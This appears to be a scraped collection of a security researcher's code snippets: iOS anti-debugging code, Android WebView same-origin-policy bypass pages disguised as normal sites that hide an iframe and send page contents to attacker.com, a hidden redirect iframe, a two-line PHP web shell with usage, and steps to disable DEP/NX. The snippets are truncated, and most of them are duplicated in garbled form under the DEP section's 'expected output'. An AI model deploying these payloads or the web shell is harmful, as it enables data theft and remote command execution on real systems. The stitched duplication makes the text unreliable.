Joshua Wright joswr1ght

## iosdebugdetect.cpp
// Build on OS X with:
// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
#import <dlfcn.h>
#import <sys/types.h>
#import <stdio.h>
typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
void disable_dbg() {
  ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
  ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
}

## catchredir.m
// Compile with:
// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
#import <Foundation/Foundation.h>
#import <stdio.h>
#import <objc/runtime.h>

@interface UrlConnection : NSObject
@property (strong) NSString *url;
- (void)connect;
@end

## AndroidWebViewRedirect.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
			parseFloat(spec.getOSVersion()) < 4.2) {
		var iframe = document.createElement('iframe');
		iframe.style.display="none";
		iframe.src = "http://attacker.com:8080";
		document.body.appendChild(iframe);

## AndroidSOPTest.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

## AndroidSOPBypass.html
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

## MetasploitSOPBypass.html
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
This is a normal website. Look at these pictures of cats...
<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android"
			&& spec.getBrowser != "Chrome"
			&& parseFloat(spec.getOSVersion()) < 4.4) {
		var iframe = document.createElement('iframe');
		iframe.style.display="none";

## tinyphpshell.php
# Attack with http://Site/shell.php?ctime=system&atime=ls+-la or even better a post.
@extract($_REQUEST);
@die ($ctime($atime));

## debian-packages-by-size.sh
dpkg-query -W --showformat='${Installed-Size;10}\t${Package}\n' | sort -k1,1n

## watchiptables.sh
watch -d -n 2 iptables -nvL # Add -t nat for PREROUTING hits

## disabledep.txt
Boot and interrupt the GRUB menu
Edit the boot configuration, changing the "linux" line by adding these two parameters to the end of the line:
    noexec=off noexec32=off
Then boot by pressing Ctrl+x.

After booting, you can check to see if DEP/NX is turned off by running:
    dmesg | grep NX

When DEP/NX is turned off you should see something similar to this output:
	// Build on OS X with:
	// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
	#import <dlfcn.h>
	#import <sys/types.h>
	#import <stdio.h>
	typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
	void disable_dbg() {
	ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
	ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
	}
	// Compile with:
	// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
	#import <Foundation/Foundation.h>
	#import <stdio.h>
	#import <objc/runtime.h>

	@interface UrlConnection : NSObject
	@property (strong) NSString *url;
	- (void)connect;
	@end
	<html><head><script src="Spec.js/lib/Spec.js"></script></head>
	<body>
	<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
	parseFloat(spec.getOSVersion()) < 4.2) {
	var iframe = document.createElement('iframe');
	iframe.style.display="none";
	iframe.src = "http://attacker.com:8080";
	document.body.appendChild(iframe);
	<html><head></head>
	<body>
	This is just a normal website...
	<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
	<script>
	document.getElementById("if").style.visibility="hidden";
	window.open("javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);
	<html><head><script src="Spec.js/lib/Spec.js"></script></head>
	<body>
	This is a normal website. Look at these pictures of cats...
	<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android"
	&& spec.getBrowser != "Chrome"
	&& parseFloat(spec.getOSVersion()) < 4.4) {
	var iframe = document.createElement('iframe');
	iframe.style.display="none";
	# Attack with http://Site/shell.php?ctime=system&atime=ls+-la or even better a post.
	@extract($_REQUEST);
	@die ($ctime($atime));
	Boot and interrupt the GRUB menu
	Edit the boot configuration, changing the "linux" line by adding these two parameters to the end of the line:
	noexec=off noexec32=off
	Then boot by pressing Ctrl+x.

	After booting, you can check to see if DEP/NX is turned off by running:
	dmesg \| grep NX

	When DEP/NX is turned off you should see something similar to this output: